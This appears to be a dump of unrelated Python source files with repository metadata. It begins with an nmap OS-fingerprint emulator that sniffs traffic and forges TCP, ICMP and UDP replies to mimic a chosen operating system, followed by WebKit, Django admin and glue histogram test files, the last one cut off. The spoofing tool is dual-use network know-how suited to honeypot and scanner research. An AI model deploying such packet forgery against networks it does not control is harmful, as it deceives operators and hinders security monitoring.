self.setTTLFromFingerprint(out_onion)
# UN. Assume 0
try: un = int(f['UN'],16)
except: un = 0
out_onion[O_ICMP].set_icmp_void(un)
# RIPL. Assume original packet just quoted
try:
ripl = int(f['RIPL'],16) # G generates exception
out_onion[O_ICMP_DATA].set_ip_len(ripl)
except:
pass
# RID. Assume original packet just quoted
try:
rid = int(f['RID'],16) # G generates exception
out_onion[O_ICMP_DATA].set_ip_id(rid)
except:
pass
# RIPCK. Assume original packet just quoted
try: ripck = f['RIPCK']
except: ripck = 'G'
if ripck == 'I': out_onion[O_ICMP_DATA].set_ip_sum(0x6765)
elif ripck == 'Z': out_onion[O_ICMP_DATA].set_ip_sum(0)
elif ripck == 'G': out_onion[O_ICMP_DATA].auto_checksum = 0
# RUCK. Assume original packet just quoted
try:
ruck = int(f['RUCK'], 16)
out_onion[O_ICMP_DATA+1].set_uh_sum(ruck)
except:
out_onion[O_ICMP_DATA+1].auto_checksum = 0
# RUD. Assume original packet just quoted
try: rud = f['RUD']
except: rud = 'G'
if rud == 'I':
udp_data = out_onion[O_ICMP_DATA+2]
udp_data.set_data('G'*udp_data.get_size())
# IPL. Assume all original packet is quoted
# This has to be the last thing we do
# as we are going to render the packet before doing it
try: ipl = int(f['IPL'], 16)
except: ipl = None
if not ipl is None:
data = out_onion[O_ICMP_DATA].get_packet()
out_onion[O_ICMP].contains(ImpactPacket.Data())
ip_and_icmp_len = out_onion[O_IP].get_size()
data = data[:ipl - ip_and_icmp_len]
data += '\x00'*(ipl-len(data)-ip_and_icmp_len)
out_onion = out_onion[:O_ICMP_DATA]
out_onion.append(ImpactPacket.Data(data))
out_onion[O_ICMP].contains(out_onion[O_ICMP_DATA])
return out_onion
class NMAP2ICMPResponder(ICMPResponder):
def buildAnswer(self, in_onion):
f = self.fingerprint
# assume R = Y
try:
if (f['R'] == 'N'): return None
except: pass
out_onion = ICMPResponder.buildAnswer(self, in_onion)
# assume DFI = N
try: dfi = f['DFI']
except: dfi = 'N'
if dfi == 'N': out_onion[O_IP].set_ip_df(False)
elif dfi == 'Y': out_onion[O_IP].set_ip_df(True)
elif dfi == 'S': out_onion[O_IP].set_ip_df(in_onion[O_IP].get_ip_df())
elif dfi == 'O': out_onion[O_IP].set_ip_df(not in_onion[O_IP].get_ip_df())
else: raise Exception('Unsupported IE(DFI=%s)' % dfi)
# assume DLI = S
try: dli = f['DLI']
except: dli = 'S'
if dli == 'S': out_onion[O_ICMP].contains(in_onion[O_ICMP_DATA])
elif dli != 'Z': raise Exception('Unsupported IE(DFI=%s)' % dli)
self.setTTLFromFingerprint(out_onion)
# assume SI = S
try: si = f['SI']
except: si = 'S'
if si == 'S': out_onion[O_ICMP].set_icmp_seq(in_onion[O_ICMP].get_icmp_seq())
elif si == 'Z': out_onion[O_ICMP].set_icmp_seq(0) # this is not currently supported by nmap, but I've done it already
else:
try: out_onion[O_ICMP].set_icmp_seq(int(si, 16)) # this is not supported either by nmap
except: raise Exception('Unsupported IE(SI=%s)' % si)
# assume CD = S
try: cd = f['CD']
except: cd = 'S'
if cd == 'Z': out_onion[O_ICMP].set_icmp_code(0)
elif cd == 'S': out_onion[O_ICMP].set_icmp_code(in_onion[O_ICMP].get_icmp_code())
elif cd == 'O': out_onion[O_ICMP].set_icmp_code(in_onion[O_ICMP].get_icmp_code()+1) # no examples in DB
else:
try: out_onion[O_ICMP].set_icmp_code(int(cd, 16)) # documented, but no examples available
except: raise Exception('Unsupported IE(CD=%s)' % cd)
# assume TOSI = S
try: tosi = f['TOSI']
except: tosi = 'S'
if tosi == 'Z': out_onion[O_IP].set_ip_tos(0)
elif tosi == 'S': out_onion[O_IP].set_ip_tos(in_onion[O_IP].get_ip_tos())
elif tosi == 'O': out_onion[O_IP].set_ip_tos(in_onion[O_IP].get_ip_tos()+1) # no examples in DB
else:
try: out_onion[O_IP].set_ip_tos(int(tosi, 16)) # documented, but no examples available
except: raise Exception('Unsupported IE(TOSI=%s)' % tosi)
return out_onion
class NMAP2TCPResponder(TCPResponder):
def buildAnswer(self, in_onion):
out_onion = TCPResponder.buildAnswer(self, in_onion)
f = self.fingerprint
# Test R: There is a response = [YN]
if (f['R'] == 'N'): return None
# Test DF: Don't fragment IP bit set = [YN]
if (f['DF'] == 'Y'): out_onion[O_IP].set_ip_df(True)
else: out_onion[O_IP].set_ip_df(False)
# Test W: Initial TCP windows size
try: win = int(f['W'],16)
except: win = 0
out_onion[O_TCP].set_th_win(win)
self.setTTLFromFingerprint(out_onion)
# Test CC: Explicit congestion notification
# Two TCP flags are used in this test: ECE and CWR
try:
cc = f['CC']
if cc == 'N': ece,cwr = 0,0
if cc == 'Y': ece,cwr = 1,0
if cc == 'S': ece,cwr = 1,1
if cc == 'O': ece,cwr = 0,1
except:
ece,cwr = 0,0
if ece: out_onion[O_TCP].set_ECE()
else: out_onion[O_TCP].reset_ECE()
if cwr: out_onion[O_TCP].set_CWR()
else: out_onion[O_TCP].reset_CWR()
# Test O: TCP Options
try: options = f['O']
except: options = ''
self.setTCPOptions(out_onion, options)
# Test S: TCP Sequence number
# Z: Sequence number is zero
# A: Sequence number is the same as the ACK in the probe
# A+: Sequence number is the same as the ACK in the probe + 1
# O: Other value
try: s = f['S']
except: s = 'O'
if s == 'Z': out_onion[O_TCP].set_th_seq(0)
if s == 'A': out_onion[O_TCP].set_th_seq(in_onion[O_TCP].get_th_ack())
if s == 'A+': out_onion[O_TCP].set_th_seq(in_onion[O_TCP].get_th_ack()+1)
if s == 'O': out_onion[O_TCP].set_th_seq(self.machine.getTCPSequence())
# Test A: TCP ACK number
# Z: Ack is zero
# S: Ack is the same as the Squence number in the probe
# S+: Ack is the same as the Squence number in the probe + 1
# O: Other value
try: a = f['A']
except: a = 'O'
if a == 'Z': out_onion[O_TCP].set_th_ack(0)
if a == 'S': out_onion[O_TCP].set_th_ack(in_onion[O_TCP].get_th_seq())
if a == 'S+': out_onion[O_TCP].set_th_ack(in_onion[O_TCP].get_th_seq()+1)
# Test Q: Quirks
# R: Reserved bit set (right after the header length)
# U: Urgent pointer non-zero and URG flag clear
try:
if 'R' in f['Q']: out_onion[O_TCP].set_flags(0x800)
except: pass
try:
if 'U' in f['Q']: out_onion[O_TCP].set_th_urp(0xffff)
except: pass
# Test F: TCP Flags
try: flags = f['F']
except: flags = ''
if 'E' in flags: out_onion[O_TCP].set_ECE()
if 'U' in flags: out_onion[O_TCP].set_URG()
if 'A' in flags: out_onion[O_TCP].set_ACK()
if 'P' in flags: out_onion[O_TCP].set_PSH()
if 'R' in flags: out_onion[O_TCP].set_RST()
if 'S' in flags: out_onion[O_TCP].set_SYN()
if 'F' in flags: out_onion[O_TCP].set_FIN()
# Test RD: TCP Data checksum (mostly for data in RST)
try:
crc = f['RD']
if crc != '0': # when the
crc = int(crc, 16)
data = 'TCP Port is closed\x00'
data += uncrc32.compensate(data, crc)
data = ImpactPacket.Data(data)
out_onion.append(data)
out_onion[O_TCP].contains(data)
except:
pass
return out_onion
def setTCPOptions(self, onion, options):
def getValue(string, i):
value = 0
idx = i
for c in options[i:]:
try:
value = value * 0x10 + int(c,16)
except:
break
idx += 1
return value, idx
# Test O,O1=O6: TCP Options
# L: End of Options
# N: NOP
# S: Selective ACK
# Mx: MSS (x is a hex number)
# Wx: Windows Scale (x is a hex number)
# Tve: Timestamp (v and e are two binary digits, v for TSval and e for TSecr
i = 0
tcp = onion[O_TCP]
while i < len(options):
opt = options[i]
i += 1
if opt == 'L': tcp.add_option(TCPOption(TCPOption.TCPOPT_EOL))
if opt == 'N': tcp.add_option(TCPOption(TCPOption.TCPOPT_NOP))
if opt == 'S': tcp.add_option(TCPOption(TCPOption.TCPOPT_SACK_PERMITTED))
if opt == 'T':
opt = TCPOption(TCPOption.TCPOPT_TIMESTAMP) # default ts = 0, ts_echo = 0
if options[i] == '1': opt.set_ts(self.machine.getTCPTimeStamp())
if options[i+1] == '1': opt.set_ts_echo(0xffffffffL)
tcp.add_option(opt)
i += 2
if opt == 'M':
maxseg, i = getValue(options, i)
tcp.add_option(TCPOption(TCPOption.TCPOPT_MAXSEG, maxseg))
if opt == 'W':
window, i = getValue(options, i)
tcp.add_option(TCPOption(TCPOption.TCPOPT_WINDOW, window))
class nmap2_SEQ(NMAP2TCPResponder):
templateClass = None
signatureName = None
seqNumber = None
def initFingerprint(self):
NMAP2TCPResponder.initFingerprint(self)
if not self.seqNumber: return
else:
OPS = self.machine.fingerprint.get_tests()['OPS']
WIN = self.machine.fingerprint.get_tests()['WIN']
self.fingerprint['O'] = OPS['O%d' % self.seqNumber]
self.fingerprint['W'] = WIN['W%d' % self.seqNumber]
class nmap2_ECN(NMAP2TCPResponder):
templateClass = os_ident.nmap2_ecn_probe
signatureName = 'ECN'
class nmap2_SEQ1(nmap2_SEQ):
templateClass = os_ident.nmap2_seq_1
signatureName = 'T1'
seqNumber = 1
class nmap2_SEQ2(nmap2_SEQ):
templateClass = os_ident.nmap2_seq_2
signatureName = 'T1'
seqNumber = 2
class nmap2_SEQ3(nmap2_SEQ):
templateClass = os_ident.nmap2_seq_3
signatureName = 'T1'
seqNumber = 3
class nmap2_SEQ4(nmap2_SEQ):
templateClass = os_ident.nmap2_seq_4
signatureName = 'T1'
seqNumber = 4
class nmap2_SEQ5(nmap2_SEQ):
templateClass = os_ident.nmap2_seq_5
signatureName = 'T1'
seqNumber = 5
class nmap2_SEQ6(nmap2_SEQ):
templateClass = os_ident.nmap2_seq_6
signatureName = 'T1'
seqNumber = 6
class nmap2_T2(NMAP2TCPResponder):
templateClass = os_ident.nmap2_tcp_open_2
signatureName = 'T2'
class nmap2_T3(NMAP2TCPResponder):
templateClass = os_ident.nmap2_tcp_open_3
signatureName = 'T3'
class nmap2_T4(NMAP2TCPResponder):
templateClass = os_ident.nmap2_tcp_open_4
signatureName = 'T4'
class nmap2_T5(NMAP2TCPResponder):
templateClass = os_ident.nmap2_tcp_closed_1
signatureName = 'T5'
class nmap2_T6(NMAP2TCPResponder):
templateClass = os_ident.nmap2_tcp_closed_2
signatureName = 'T6'
class nmap2_T7(NMAP2TCPResponder):
templateClass = os_ident.nmap2_tcp_closed_3
signatureName = 'T7'
class nmap2_ICMP_1(NMAP2ICMPResponder):
templateClass = os_ident.nmap2_icmp_echo_probe_1
signatureName = 'IE'
class nmap2_ICMP_2(NMAP2ICMPResponder):
templateClass = os_ident.nmap2_icmp_echo_probe_2
signatureName = 'IE'
class Machine:
AssumedTimeIntervalPerPacket = 0.11 # seconds
def __init__(self, emmulating, interface, ipAddress, macAddress, openTCPPorts = [], openUDPPorts = [], nmapOSDB = 'nmap-os-db'):
self.interface = interface
self.ipAddress = ipAddress
self.macAddress = macAddress
self.responders = []
self.decoder = ImpactDecoder.EthDecoder()
self.initPcap()
self.initFingerprint(emmulating, nmapOSDB)
self.initSequenceGenerators()
self.openTCPPorts = openTCPPorts
self.openUDPPorts = openUDPPorts
print self
def openUDPPort(self, port):
if self.isUDPPortOpen(port): return
self.openUDPPorts.append(port)
def isUDPPortOpen(self, port):
return port in self.openUDPPorts
def isTCPPortOpen(self, port):
return port in self.openTCPPorts
def initPcap(self):
self.pcap = pcapy.open_live(self.interface, 65535, 1, 0)
try: self.pcap.setfilter("host %s or ether host %s" % (self.ipAddress, self.macAddress))
except: self.pcap.setfilter("host %s or ether host %s" % (self.ipAddress, self.macAddress), 1, 0xFFFFFF00)
def initGenericResponders(self):
# generic responders
self.addResponder(ARPResponder(self))
self.addResponder(OpenUDPResponder(self))
self.addResponder(ClosedUDPResponder(self))
self.addResponder(OpenTCPResponder(self))
self.addResponder(ClosedTCPResponder(self))
def initFingerprint(self, emmulating, nmapOSDB):
fpm = os_ident.NMAP2_Fingerprint_Matcher('')
f = file(nmapOSDB, 'r')
for text in fpm.fingerprints(f):
fingerprint = fpm.parse_fp(text)
if fingerprint.get_id() == emmulating:
self.fingerprint = fingerprint
self.simplifyFingerprint()
# print fingerprint
return
raise Exception, "Couldn't find fingerprint data for %r" % emmulating
def simplifyFingerprint(self):
tests = self.fingerprint.get_tests()
for probeName in tests:
probe = tests[probeName]
for test in probe:
probe[test] = probe[test].split('|')[0]
def initSequenceGenerators(self):
self.initIPIDGenerator()
self.initTCPISNGenerator()
self.initTCPTSGenerator()
def initIPIDGenerator(self):
seq = self.fingerprint.get_tests()['SEQ']
self.ip_ID = 0
try: TI = seq['TI']
except: TI = 'O'
if TI == 'Z': self.ip_ID_delta = 0
elif TI == 'RD': self.ip_ID_delta = 30000
elif TI == 'RI': self.ip_ID_delta = 1234
elif TI == 'BI': self.ip_ID_delta = 1024+256
elif TI == 'I': self.ip_ID_delta = 1
elif TI == 'O': self.ip_ID_delta = 123
else: self.ip_ID_delta = int(TI, 16)
try: ss = seq['SS']
except: ss = 'O'
self.ip_ID_ICMP_delta = None
if ss == 'S': self.ip_ID_ICMP = None
else:
self.ip_ID_ICMP = 0
try: II = seq['II']
except: II = 'O'
if II == 'Z': self.ip_ID_ICMP_delta = 0
elif II == 'RD': self.ip_ID_ICMP_delta = 30000
elif II == 'RI': self.ip_ID_ICMP_delta = 1234
elif II == 'BI': self.ip_ID_ICMP_delta = 1024+256
elif II == 'I': self.ip_ID_ICMP_delta = 1
elif II == 'O': self.ip_ID_ICMP_delta = 123
else: self.ip_ID_ICMP_delta = int(II, 16)
# generate a few, so we don't start with 0 when we don't have to
for i in range(10):
self.getIPID()
self.getIPID_ICMP()
print "IP ID Delta: %d" % self.ip_ID_delta
print "IP ID ICMP Delta: %s" % self.ip_ID_ICMP_delta
def initTCPISNGenerator(self):
# tcp_ISN and tcp_ISN_delta for TCP Initial sequence numbers
self.tcp_ISN = 0
try:
self.tcp_ISN_GCD = int(self.fingerprint.get_tests()['SEQ']['GCD'].split('-')[0], 16)
except:
self.tcp_ISN_GCD = 1
try:
isr = self.fingerprint.get_tests()['SEQ']['ISR'].split('-')
if len(isr) == 1:
isr = int(isr[0], 16)
else:
isr = (int(isr[0], 16) + int(isr[1], 16)) / 2
except:
isr = 0
try:
sp = self.fingerprint.get_tests()['SEQ']['SP'].split('-')
sp = int(sp[0], 16)
except:
sp = 0
self.tcp_ISN_stdDev = (2**(sp/8.0)) * 5 / 4 # n-1 on small populations... erm...
if self.tcp_ISN_GCD > 9:
self.tcp_ISN_stdDev *= self.tcp_ISN_GCD
self.tcp_ISN_stdDev *= self.AssumedTimeIntervalPerPacket
self.tcp_ISN_delta = 2**(isr/8.0) * self.AssumedTimeIntervalPerPacket
# generate a few, so we don't start with 0 when we don't have to
for i in range(10): self.getTCPSequence()
print "TCP ISN Delta: %f" % self.tcp_ISN_delta
print "TCP ISN Standard Deviation: %f" % self.tcp_ISN_stdDev
def initTCPTSGenerator(self):
# tcp_TS and tcp_TS_delta for TCP Time stamp generation
self.tcp_TS = 0
try: ts = self.fingerprint.get_tests()['SEQ']['TS']
except: ts = 'U'
if ts == 'U' or ts == 'Z': self.tcp_TS_delta = 0
else:
self.tcp_TS_delta = (2**int(ts, 16)) * self.AssumedTimeIntervalPerPacket
# generate a few, so we don't start with 0 when we don't have to
for i in range(10): self.getTCPTimeStamp()
print "TCP TS Delta: %f" % self.tcp_TS_delta
def getIPID(self):
answer = self.ip_ID
self.ip_ID += self.ip_ID_delta
self.ip_ID %= 0x10000L
# print "IP ID: %x" % answer
return answer
def getIPID_ICMP(self):
if self.ip_ID_ICMP is None:
return self.getIPID()
answer = self.ip_ID_ICMP
self.ip_ID_ICMP += self.ip_ID_ICMP_delta
self.ip_ID_ICMP %= 0x10000L
# print "---> IP ID: %x" % answer
return answer
def getTCPSequence(self):
answer = self.tcp_ISN + self.tcp_ISN_stdDev # *random.random()
self.tcp_ISN_stdDev *= -1
answer = int(int(answer/self.tcp_ISN_GCD) * self.tcp_ISN_GCD)
self.tcp_ISN += self.tcp_ISN_delta
self.tcp_ISN %= 0x100000000L
# print "---> TCP Sequence: %d" % (answer % 0x100000000L)
return answer % 0x100000000L
def getTCPTimeStamp(self):
answer = int(round(self.tcp_TS))
self.tcp_TS += self.tcp_TS_delta
self.tcp_TS %= 0x100000000L
# print "---> TCP Time Stamp: %x" % answer
return answer
def sendPacket(self, onion):
if not onion: return
print "--> Packet sent:"
#print onion[0]
#print
self.pcap.sendpacket(onion[O_ETH].get_packet())
def addResponder(self, aResponder):
self.responders.append(aResponder)
def run(self):
while 1:
p = self.pcap.next()
try: in_onion = [self.decoder.decode(p[1])]
except: in_onion = [self.decoder.decode(p[0])]
try:
while 1: in_onion.append(in_onion[-1].child())
except:
pass
#print "-------------- Received: ", in_onion[0]
for r in self.responders:
if r.process(in_onion): break
def main():
def initResponders(machine):
# cmd responder
# machine.addResponder(UDPCommandResponder(machine).set_port(UDP_CMD_PORT))
# nmap2 specific responders
machine.addResponder(nmap2_SEQ1(machine))
machine.addResponder(nmap2_SEQ2(machine))
machine.addResponder(nmap2_SEQ3(machine))
machine.addResponder(nmap2_SEQ4(machine))
machine.addResponder(nmap2_SEQ5(machine))
machine.addResponder(nmap2_SEQ6(machine))
machine.addResponder(nmap2_ECN(machine))
machine.addResponder(nmap2_T2(machine))
machine.addResponder(nmap2_T3(machine))
machine.addResponder(nmap2_T4(machine))
machine.addResponder(nmap2_T5(machine))
machine.addResponder(nmap2_T6(machine))
machine.addResponder(nmap2_T7(machine))
machine.addResponder(nmap2_ICMP_1(machine))
machine.addResponder(nmap2_ICMP_2(machine))
machine.addResponder(NMAP2UDPResponder(machine))
from sys import argv, exit
def usage():
print """
if arg == '-h': usage()
if arg == '--help': usage()
if arg == '-f': Fingerprint = value
if arg == '-p': IP = value
if arg == '-m': MAC = value
if arg == '-i': IFACE = value
if arg == '-d': nmapOsDB = value
where:
arg = argv[i]
value = argv[i+1]
"""
exit()
global Fingerprint, IFACE, MAC, IP, nmapOSDB
for i in xrange(len(argv)):
arg = argv[i]
try: value = argv[i+1]
except: value = None
if arg == '-h': usage()
if arg == '--help': usage()
if arg == '-f': Fingerprint = value
if arg == '-p': IP = value
if arg == '-m': MAC = value
if arg == '-i': IFACE = value
if arg == '-d': nmapOSDB = value
print "Emulating: %r" % Fingerprint
print "at %s / %s / %s" % (IFACE, MAC, IP)
machine = Machine(
Fingerprint,
IFACE,
IP,
MAC,
OPEN_TCP_PORTS,
OPEN_UDP_PORTS,
nmapOSDB = nmapOSDB)
initResponders(machine)
machine.initGenericResponders()
machine.run()
if __name__ == '__main__':
main()
# All Probes
# [x] SEQ
# [x] OPS
# [x] WIN
# [x] T1
# [x] T2
# [x] T3
# [x] T4
# [x] T5
# [x] T6
# [x] T7
# [x] IE
# [x] ECN
# [x] U1
# All Tests
# SEQ()
# [x] TCP ISN sequence predictability index (SP)
# [x] TCP ISN greatest common divisor (GCD)
# [x] TCP ISN counter rate (ISR)
# [x] IP ID sequence generation algorithm on TCP Open ports (TI)
# [x] Z - All zeros
# [x] RD - Random: It increments at least once by at least 20000.
# [-] Hex Value - fixed IP ID
# [x] RI - Random positive increments. Any (delta_i > 1000, and delta_i % 256 != 0) or (delta_i > 256000 and delta_i % 256 == 0)
# [x] BI - Broken increment. All delta_i % 256 = 0 and all delta_i <= 5120.
# [x] I - Incremental. All delta_i < 10
# [x] O - (Ommited, the test does not show in the fingerprint). None of the other
# [-] IP ID sequence generation algorithm on TCP closed ports (CI)
# [x] IP ID sequence generation algorithm on ICMP messages (II)
# [x] Shared IP ID sequence Boolean (SS)
# [x] TCP timestamp option algorithm (TS)
# [x] U - unsupported (don't send TS)
# [x] 0 - Zero
# [x] 1 - 0-5.66 (2 Hz)
# [x] 7 - 70-150 (100 Hz)
# [x] 8 - 150-350 (200 Hz)
# [x] - avg_freq = sum(TS_diff/time_diff) . round(.5 + math.log(avg_freq)/math.log(2)))
# time_diff = 0.11 segs
# OPS()
# [x] TCP options (O, O1-O6)
# WIN()
# [x] TCP initial window size (W, W1-W6)
# ECN, T1-T7
# [x] TCP options (O, O1-O6)
# [x] TCP initial window size (W, W1-W6)
# [x] Responsiveness (R)
# [x] IP don't fragment bit (DF)
# [x] IP initial time-to-live (T)
# [x] IP initial time-to-live guess (TG)
# [x] Explicit congestion notification (CC)
# [x] TCP miscellaneous quirks (Q)
# [x] TCP sequence number (S)
# [x] TCP acknowledgment number (A)
# [x] TCP flags (F)
# [x] TCP RST data checksum (RD)
# IE()
# [x] Responsiveness (R)
# [x] Don't fragment (ICMP) (DFI)
# [x] IP initial time-to-live (T)
# [x] IP initial time-to-live guess (TG)
# [x] ICMP response code (CD)
#-[x] IP Type of Service (TOSI)
#-[x] ICMP Sequence number (SI)
#-[x] IP Data Length (DLI)
# U1()
# [x] Responsiveness (R)
# [x] IP don't fragment bit (DF)
# [x] IP initial time-to-live (T)
# [x] IP initial time-to-live guess (TG)
# [x] IP total length (IPL)
# [x] Unused port unreachable field nonzero (UN)
# [x] Returned probe IP total length value (RIPL)
# [x] Returned probe IP ID value (RID)
# [x] Integrity of returned probe IP checksum value (RIPCK)
# [x] Integrity of returned probe UDP checksum (RUCK)
# [x] Integrity of returned UDP data (RUD)
# [-] ??? (TOS) Type of Service
# [-] ??? (RUL) Length of return UDP packet is correct
# sudo nmap -O 127.0.0.2 -p 22,111,89
# sudo python nmapAnswerMachine.py -i eth0 -p 192.168.66.254 -f 'Sun Solaris 9 (SPARC)'
| [
"la236am@users.isi.deterlab.net"
] | la236am@users.isi.deterlab.net |
7e05461799b0f76803a45bd5d539ec259176b050 | 2a28bb9594fe98a6e8934b6e5eb952baa3a0b803 | /Tools/Scripts/libraries/webkitscmpy/webkitscmpy/__init__.py | 9f3ebe6570c7c695504043d655d51c588165c7f4 | [] | no_license | yolin1020/WebKit | 154b0f177b0d48be66e78717e85d98e546dcf9c5 | b7e84a4224b3934868bc08f5c89b583355a6c87a | refs/heads/main | 2023-02-02T22:48:08.044648 | 2020-12-18T19:34:39 | 2020-12-18T19:34:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,698 | py | # Copyright (C) 2020 Apple Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY APPLE INC. AND ITS CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR ITS CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import logging
import os
import sys
log = logging.getLogger('webkitscmpy')
def _maybe_add_webkitcorepy_path():
# Hopefully we're beside webkitcorepy, otherwise webkitcorepy will need to be installed.
libraries_path = os.path.dirname(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
webkitcorepy_path = os.path.join(libraries_path, 'webkitcorepy')
if os.path.isdir(webkitcorepy_path) and os.path.isdir(os.path.join(webkitcorepy_path, 'webkitcorepy')) and webkitcorepy_path not in sys.path:
sys.path.insert(0, webkitcorepy_path)
_maybe_add_webkitcorepy_path()
try:
from webkitcorepy import AutoInstall, Package, Version
except ImportError:
raise ImportError(
"'webkitcorepy' could not be found on your Python path.\n" +
"You are not running from a WebKit checkout.\n" +
"Please install webkitcorepy with `pip install webkitcorepy --extra-index-url <package index URL>`"
)
version = Version(0, 6, 4)
AutoInstall.register(Package('fasteners', Version(0, 15, 0)))
AutoInstall.register(Package('monotonic', Version(1, 5)))
AutoInstall.register(Package('xmltodict', Version(0, 12, 0)))
from webkitscmpy.contributor import Contributor
from webkitscmpy.commit import Commit
from webkitscmpy.scm_base import ScmBase
from webkitscmpy import local
from webkitscmpy import mocks
name = 'webkitscmpy'
| [
"jbedard@apple.com"
] | jbedard@apple.com |
4d32b5dceb9de6e224b0bfe285ac1b75465b2816 | 45954869eb53b1f6fe4b675494b72a76fcac534c | /instagram/admin.py | d5b6d964da407dab1a778d7eba0041e2bb736d71 | [
"MIT"
] | permissive | Jmos-Mbugua/Insta-clone | b69f39a9d3e7ad8b21bcf77a4695a17a4dc75b74 | 85ab0f3ee93c2ed5b9778058e3df31e25563e5e8 | refs/heads/master | 2022-12-14T22:16:14.829459 | 2020-02-14T12:59:16 | 2020-02-14T12:59:16 | 239,035,462 | 0 | 0 | null | 2022-12-08T03:36:40 | 2020-02-07T22:42:39 | Python | UTF-8 | Python | false | false | 228 | py | from django.contrib import admin
from .models import Location, Post,Comment, Profile
# Register your models here.
admin.site.register(Location)
admin.site.register(Post)
admin.site.register(Comment)
admin.site.register(Profile) | [
"johnmbugua849@gmail.com"
] | johnmbugua849@gmail.com |
b5f75d478ae8417a7b455f03ba8803cfefa44c07 | 9ecefebb7f8e1445a5e93479f3e00b9181b6536c | /glue/viewers/histogram/qt/tests/test_data_viewer.py | 3511565a2f986e73b432a33cd48befa97df70bcb | [
"BSD-3-Clause"
] | permissive | akshayakhare/glue | 938f4c4a7c16cfceed9b60bcca0af94b705c97aa | 1471126c876e787270ec6fd33d997ad68ff32fea | refs/heads/master | 2021-08-14T20:20:31.929041 | 2017-11-16T16:22:10 | 2017-11-16T18:05:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 19,573 | py | # pylint: disable=I0011,W0613,W0201,W0212,E1101,E1103
from __future__ import absolute_import, division, print_function
import os
from collections import Counter
import pytest
from numpy.testing import assert_equal, assert_allclose
from glue.core.message import SubsetUpdateMessage
from glue.core import HubListener, Data
from glue.core.roi import XRangeROI
from glue.core.subset import RangeSubsetState, CategoricalROISubsetState
from glue import core
from glue.core.component_id import ComponentID
from glue.core.tests.util import simple_session
from glue.utils.qt import combo_as_string
from glue.viewers.matplotlib.qt.tests.test_data_viewer import BaseTestMatplotlibDataViewer
from glue.core.state import GlueUnSerializer
from glue.app.qt.layer_tree_widget import LayerTreeWidget
from ..data_viewer import HistogramViewer
DATA = os.path.join(os.path.dirname(__file__), 'data')
class TestHistogramCommon(BaseTestMatplotlibDataViewer):
def init_data(self):
return Data(label='d1', x=[3.4, 2.3, -1.1, 0.3], y=['a', 'b', 'c', 'a'])
viewer_cls = HistogramViewer
class TestHistogramViewer(object):
def setup_method(self, method):
self.data = Data(label='d1', x=[3.4, 2.3, -1.1, 0.3], y=['a', 'b', 'c', 'a'])
self.session = simple_session()
self.hub = self.session.hub
self.data_collection = self.session.data_collection
self.data_collection.append(self.data)
self.viewer = HistogramViewer(self.session)
self.data_collection.register_to_hub(self.hub)
self.viewer.register_to_hub(self.hub)
def teardown_method(self, method):
self.viewer.close()
def test_basic(self):
viewer_state = self.viewer.state
# Check defaults when we add data
self.viewer.add_data(self.data)
assert combo_as_string(self.viewer.options_widget().ui.combosel_x_att) == 'Main components:x:y:Coordinate components:Pixel Axis 0 [x]:World 0'
assert viewer_state.x_att is self.data.id['x']
assert viewer_state.x_min == -1.1
assert viewer_state.x_max == 3.4
assert viewer_state.y_min == 0.0
assert viewer_state.y_max == 1.2
assert viewer_state.hist_x_min == -1.1
assert viewer_state.hist_x_max == 3.4
assert viewer_state.hist_n_bin == 15
assert not viewer_state.cumulative
assert not viewer_state.normalize
assert not viewer_state.x_log
assert not viewer_state.y_log
assert len(viewer_state.layers) == 1
# Change to categorical component and check new values
viewer_state.x_att = self.data.id['y']
assert viewer_state.x_min == -0.5
assert viewer_state.x_max == 2.5
assert viewer_state.y_min == 0.0
assert viewer_state.y_max == 2.4
assert viewer_state.hist_x_min == -0.5
assert viewer_state.hist_x_max == 2.5
assert viewer_state.hist_n_bin == 3
assert not viewer_state.cumulative
assert not viewer_state.normalize
assert not viewer_state.x_log
assert not viewer_state.y_log
def test_flip(self):
viewer_state = self.viewer.state
self.viewer.add_data(self.data)
assert viewer_state.x_min == -1.1
assert viewer_state.x_max == 3.4
self.viewer.options_widget().button_flip_x.click()
assert viewer_state.x_min == 3.4
assert viewer_state.x_max == -1.1
def test_remove_data(self):
self.viewer.add_data(self.data)
assert combo_as_string(self.viewer.options_widget().ui.combosel_x_att) == 'Main components:x:y:Coordinate components:Pixel Axis 0 [x]:World 0'
self.data_collection.remove(self.data)
assert combo_as_string(self.viewer.options_widget().ui.combosel_x_att) == ''
def test_update_component_updates_title(self):
self.viewer.add_data(self.data)
assert self.viewer.windowTitle() == '1D Histogram'
self.viewer.state.x_att = self.data.id['y']
assert self.viewer.windowTitle() == '1D Histogram'
def test_combo_updates_with_component_add(self):
self.viewer.add_data(self.data)
self.data.add_component([3, 4, 1, 2], 'z')
assert self.viewer.state.x_att is self.data.id['x']
assert combo_as_string(self.viewer.options_widget().ui.combosel_x_att) == 'Main components:x:y:z:Coordinate components:Pixel Axis 0 [x]:World 0'
def test_nonnumeric_first_component(self):
# regression test for #208. Shouldn't complain if
# first component is non-numerical
data = core.Data()
data.add_component(['a', 'b', 'c'], label='c1')
data.add_component([1, 2, 3], label='c2')
self.data_collection.append(data)
self.viewer.add_data(data)
def test_histogram_values(self):
